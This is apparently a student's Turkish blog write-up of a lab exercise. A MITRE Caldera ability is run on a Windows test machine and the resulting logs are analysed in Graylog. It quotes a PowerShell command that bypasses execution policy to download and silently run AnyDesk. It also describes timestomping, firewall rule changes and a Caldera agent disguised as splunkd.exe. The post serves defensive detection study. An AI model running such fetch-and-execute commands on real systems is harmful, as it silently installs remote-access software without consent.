MITRE Caldera ile Zafiyet Oluşturma ve Log Analizi

MİTRE CALDERA MITRE Corporation tarafından geliştirilmiştir. Temelinde MİTRE ATT&CK Framework yapısını barındıran CALDERA savunma sistemlerini güçlendirme, saldırgan davranışlarını analiz etme ve taklit etme, siber güvenlik takımlarının iş birliği ve perspektifini artırma gibi amaçlarla oluşturulmuş bir üründür. Açık kaynaklı olmasının yanı sıra düşük maliyetlerle testler gerçekleştirmeye imkan sağlamaktadır. İçerisinde ajan tabanlı bir yapıya sahiptir ve bu yapı sayesinde yüklenilen sistemde hafiflik sağlamaktadır. Analiz ve raporlama araçlarıyla da yapılan işlemlerin sonuçlarını incelemede kolaylık sağlamaktadır.

MITRE Caldera ile Zafiyet Oluşturma ve Log Analizi

Belirlenen çalışma doğrultusunda kurulumu gerçekleştirilmiş olan Caldera için yapılan tarama sonuçlarının incelenmesi ve log kontrolünün yapılması ile Graylog üzerinde karşılanan event logların inceleme çalışması gerçekleştirilmiştir. Kurulum adımları için bir önceki bloğu inceleyebilirsiniz.

Şekil 1 Ability Anydesk Files Detected Test on Windows

Daha önce yapılmış olan kurulum adımları sonrasında Anydesk File Detect Test on Windows alarmı özelinde çalışma yürütülmeye devam edilmiş olup yapılan incelemeler detaylandırılmıştır.

Şekil 2 Graylog Oluşan Event logları

Bu incelemeler sonucunda yapılan ve çalıştırılan framework ’lerin Windows makine üzerinde oluşturulduğu loglar şekilde göründüğü üzere Graylog da bu şekilde bir akış yaratmıştır.  Akış incelendiğinde Windows makine içerisinde kurulmamış olan ama oluşturulan framework içerisinde seçilen Anydesk File Detect Test on Windows framework ‘ünün çalıştığını Anydesk.exe ‘yi indirip bağlantı kurmaya çalıştığını görüntülemeyi sağlamıştır. Bunun dışında şekilde Windows makinesinin ekran görüntüsüne de yansımıştır.

Şekil 3 Anydesk İndirilmiş Windows ekran görüntüsü

İlgili durumla özelinde yapılan analiz:

Yapılan incelemelerde sistemde Anydesk.exe indirmek için bir powershell logu ile karşılaşılmıştır.

Şekil 4 Anydesk indirme Powershell komutu

powershell.exe -ExecutionPolicy Bypass -C "Invoke-WebRequest -OutFile C:\Users\$env:username\Desktop\AnyDesk.exe https://download.anydesk.com/AnyDesk.exe; $file1 = \"C:\Users\\\" + $env:username + \"\Desktop\AnyDesk.exe\"; Start-Process $file1 /S;" ParentUser: DESKTOP-B4PTVFG\test

-ExecutionPolicy Bypass parametresi kullanılarak güvenlik denetimleri atlatılmaya çalışılmış Invoke-WebRequest parametresi ile web bağlantısı kurmak için kullanılmış ve –OutFile ile alınan veriler bir dosyaya kaydedilip bu file çalışılan kullanıcı üzerinden çalıştırılmıştır ve /S parametresi sayesinde sessiz kurulum işlemi gerçekleştirilmiştir.

Anydesk.exe  lokal bir servis gibi çalıştırılmıştır. Lokal servis sistemde sınırlı izinlere sahiptir ve yalnızca yerel kaynaklara erişim için kullanılır.

Şekil 5 Anydesk çalıştırma logu

Daha detaylı kontrollere devam edildiğinde devam eden işlem sürecinde bazı .dll uzantılı işleme yüklendiği görülmüştür.

Şekil 6 Çalışan bazı .dll dosyaları

Kontroller sonucunda bu .dll dosyalarının Windows'un bir güvenlik bileşeni olduğu tespit edilmiştir.

Şekil 7  Çalışan bazı .dll dosyaları 2

Devam edilen incelemelerde dosya zaman bilgisinin manipüle edilmesiyle ilgili bir etkinliği görülmüş olup yapılan incelemeler sonucunda MITRE ATT&CK Timestomp saldırı tekniğinin kullanılarak “Son Kullanılanlar” dizinindeki bir dosyanın zaman bilgisi üzerinde 1 saat 10 dakikalık bir geri alma işlemi gerçekleştirildiği görülmüştür.

Şekil 8 Zaman manipülasyonu logu

Sonrasında incelemelere devam edildiğinde Microsoft-Windows-Windows Firewall With Advanced Security/Firewall üzerinde bazı kuralların değiştirilme logları görülmektedir. 

Şekil 9 Microsoft-Windows-Windows Firewall With Advanced Security/Firewall kural örneği

Bu loglara göre Anydesk adında kural tanımlandığı sonrasın da bu kuralların silindiği gibi işlemler görülmüştür.

Şekil 10 Microsoft-Windows-Windows Firewall With Advanced Security/Firewall kural örneği 2

Yapılan işlemler sonucunda bazı bağlantı logları ile karşılaşılmıştır. 

Şekil 11 Network Bağlantı logu 1

Şekil 12 Network Bağlantı logu 2

Loglar incelendiğinde Anydesk.exe tarafından 3.165.190.73  ve 169.150.215.50 IP adreslerine istek yapılmıştır.

Şekil 13 Network Bağlantı logu 3

C:\Users\Public\splunkd.exe tarafından bir süreç başlatılmış olup burada server IP adresi olarak CALDERA ‘yı görmekteyiz ve red grubundan bağlantı kurularak powershell.exe çalıştırılmıştır.

Şekil 14 Powershell  Anydesk silme komutu

Kurulan Anydesk.exe dosyasını kaldırmak için işlem gerçekleştirilmiştir. Fakat incelemelerde de görülmekte olduğu gibi işlem tamamlanamamıştır.

Genel analiz sonucu:

Yapılan incelemeler sonucunda belirtilen  CALDERA server ‘ın agentı olan splukd.exe tarafından çalıştırılan belirli komutlar sayesinde Windows makine olan “test” isimli kullanıcı kullanılarak Anydesk.exe powershell.exe tarafından indirilip sistemde sessizce kurulmuş olup bazı nokta ve sunuculara bağlantı kurma işlemi gerçekleştirilmiştir.

Durum incelendiğinde zararlı dosya olarak splukd.exe olarak görülmüş olup lokal de bulunan 192.168.86.147 IP adresinde bulunan hosta ve işlemlerin gerçekleştirilmiş olduğu Windows makine içerisinde fullscan ve log analizi yapılması tavsiye edilir.

I am studying Forensic Informatics Engineering at Firat University. I am a three-year student who actively enjoys working in communities, is compatible with teamwork, open to learning, participates in trainings and conferences, and takes an active part in community work. I have been interested in cybersecurity for more than 2 years and have been dealing with CTF and similar issues. I am interested in system analysis and log analysis. I am working in the pentest field and also improving myself in the network field.